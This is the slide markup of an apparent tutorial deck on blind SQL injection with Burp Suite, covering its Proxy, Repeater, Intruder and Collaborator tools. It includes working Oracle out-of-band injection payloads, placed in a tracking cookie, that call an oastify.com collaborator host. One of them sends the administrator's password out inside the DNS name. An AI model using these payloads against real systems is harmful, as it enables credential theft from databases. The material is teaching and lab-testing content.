                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>(SELECT+EXTRACTVALUE(xmltype('&lt;%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f&gt;&lt;!DOCTYPE+root+[+&lt;!ENTITY+%25+remote+SYSTEM+"http://cp5dabrggjp1lelmcffmpbx1lsrjf93y.oastify.com"&gt;+%25remote%3b]&gt;'),'/l')+FROM+dual)--; session=sTjXNAz7vDFNmQn9Wb6UrIvxuZB72o3R</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>After adding Tracking ID and again going to repeater and modifying cooking Tracking ID as this we get-</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="750" name="Google Shape;750;p97"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="751" name="Google Shape;751;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313224" y="3223100"/>
            <a:ext cx="8134450" cy="865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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699900" y="1100625"/>
            <a:ext cx="7860300" cy="3340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t>We will send this request and If everything is correct ,the connection is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>established</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> with the database and then we go to the Burp Collaborator and start polling we would now get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> and by this we can say that the connection is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>established</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>.</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="Google Shape;757;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699900" y="60291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Out of Band Interaction</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="758" name="Google Shape;758;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384550" y="2163225"/>
            <a:ext cx="6235450" cy="180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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699900" y="1675900"/>
            <a:ext cx="81228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t>By this we can say that a connection is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>established</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t> between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t> and collaborating server.</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="764" name="Google Shape;764;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027925" y="864030"/>
            <a:ext cx="7069450" cy="70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0"/>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0"/>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71" name="Google Shape;771;p100"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="413375" y="633275"/>
            <a:ext cx="8119427" cy="4035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1"/>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1"/>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78" name="Google Shape;778;p101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="208375" y="404625"/>
            <a:ext cx="8748974" cy="42424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2"/>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2"/>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85" name="Google Shape;785;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="103625" y="432950"/>
            <a:ext cx="8892049" cy="42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713250" y="1104100"/>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Burp Suite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>is a widely used web application security testing tool developed by PortSwigger. It is designed to help security professionals and ethical hackers identify and exploit vulnerabilities in web applications. Burp Suite provides a wide range of features and functionalities to facilitate various aspects of web application security testing, including detecting and exploiting Blind SQL Injection vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Here's an overview of how some of the key Burp Suite tools can be helpful in Blind SQL Injection testing:</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Burp Suite includes a proxy feature that allows you to intercept and modify HTTP requests and responses between your web browser and the target web application. This is essential for identifying potential blind SQL injection points, capturing requests, and analyzing server responses.</a:t>
            </a:r>
            <a:endParaRPr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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The Repeater tool in Burp Suite allows you to manually modify and re-send HTTP requests to the web application. This is crucial for crafting and testing various blind SQL injection payloads to see how the application responds. You can observe delays, errors, or other behavior that might indicate a successful injection.</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3"/>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03"/>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92" name="Google Shape;792;p103"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="38625" y="1005761"/>
            <a:ext cx="9143999" cy="31319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799" name="Google Shape;799;p104"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="589025" y="401250"/>
            <a:ext cx="8142624" cy="4341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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488250" y="1167897"/>
            <a:ext cx="7409100" cy="29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(SELECT EXTRACTVALUE(xmltype('&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM "http://'||(SELECT password from users where username='administrator')||'.01z2shyhoc4whxerczuk0085ww2nqie7.oastify.com/"&gt; %remote;]&gt;'),'/l') FROM dual)--</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We will add it to the cookie tracking id</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1948475" y="683325"/>
            <a:ext cx="59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For obtaining  password -</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="18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106"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="38740" l="0" r="33532" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="189950" y="559350"/>
            <a:ext cx="8363926" cy="43361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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2708425" y="19696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txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713250" y="538475"/>
            <a:ext cx="7717500" cy="40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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Burp Suite Intruder tool can automate the process of sending a large number of HTTP requests with different payloads to a specific parameter, making it easier to detect blind SQL injection vulnerabilities. You can use customized payloads and indicators to identify whether a SQL query injected into the application is true or false.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collaborator:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Burp Collaborator is a feature that assists in detecting various types of server interactions, such as DNS and HTTP requests initiated by the application under test. It can be useful in identifying Blind SQL Injection vulnerabilities where the application's behavior results in external interactions, as it can help you confirm the injection and monitor these interactions.</a:t>
            </a:r>
            <a:endParaRPr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Overall, Burp Suite provides a comprehensive set of tools and features to assist security professionals in the discovery and exploitation of blind SQL injection vulnerabilities.</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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="445025"/>
            <a:ext cx="72726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Font typeface="Montserrat"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="506" name="Google Shape;506;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="53596" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="723300" y="1223250"/>
            <a:ext cx="7697400" cy="3146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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="445025"/>
            <a:ext cx="72726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latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>2. Intruder</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="512" name="Google Shape;512;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="37181" l="0" r="36439" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="1267450"/>
            <a:ext cx="7628376" cy="3161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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="445025"/>
            <a:ext cx="72726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latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>. Repeater</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="518" name="Google Shape;518;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="38781" l="0" r="36370" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="817425" y="1350800"/>
            <a:ext cx="7509149" cy="321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